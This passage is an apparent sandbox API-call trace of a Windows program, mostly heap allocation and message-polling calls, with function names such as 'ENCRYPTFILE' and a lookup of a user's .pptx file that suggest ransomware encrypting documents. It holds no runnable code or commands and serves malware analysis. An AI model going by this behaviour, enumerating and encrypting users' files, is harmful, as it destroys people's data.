wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac280 | out: hHeap=0x1780000) returned 1 [0079.149] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2f8 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0079.149] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24d0 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b218f0 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24c0 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0079.150] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.150] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.150] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24d0 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2430 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2400 [0079.150] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0079.150] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe0) returned 0x19e5358 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3e8 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2430 | out: hHeap=0x1780000) returned 1 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2430 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0079.151] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d68 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d68 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0079.151] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2410 | out: hHeap=0x1780000) returned 1 [0079.151] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0079.151] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.152] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\g_XT5mjGuHk8Nmh4F.pptx", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe20f20, ftCreationTime.dwHighDateTime=0x1d5e0ea, ftLastAccessTime.dwLowDateTime=0x240c9dd0, ftLastAccessTime.dwHighDateTime=0x1d5e626, ftLastWriteTime.dwLowDateTime=0x240c9dd0, ftLastWriteTime.dwHighDateTime=0x1d5e626, nFileSizeHigh=0x0, nFileSizeLow=0xb11b, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="g_XT5mjGuHk8Nmh4F.pptx", cAlternateFileName="G_XT5M~1.PPT")) returned 0x41ac500 [0079.152] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca430 | out: hHeap=0x1780000) returned 1 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca418 | out: hHeap=0x1780000) returned 1 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2410 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.152] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391cb0 [0079.152] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391cb0 | out: hHeap=0x1780000) returned 1 [0079.152] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2460 | out: hHeap=0x1780000) returned 1 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0079.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2460 [0079.153] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0079.153] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2380 [0079.153] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2440 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2470 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.154] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2470 | out: hHeap=0x1780000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2470 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e24a0 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e23a0 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e23a0 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2480 [0079.154] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2480 | out: hHeap=0x1780000) returned 1 [0079.154] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2520 [0079.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2480 [0079.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24c0 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24e0 [0079.155] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24e0 | out: hHeap=0x1780000) returned 1 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0079.155] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24e0 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0079.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0079.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0079.156] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.156] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0079.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0079.157] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0079.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0079.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0079.157] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0079.157] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8b0 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.158] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0079.158] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0079.159] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0079.159] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 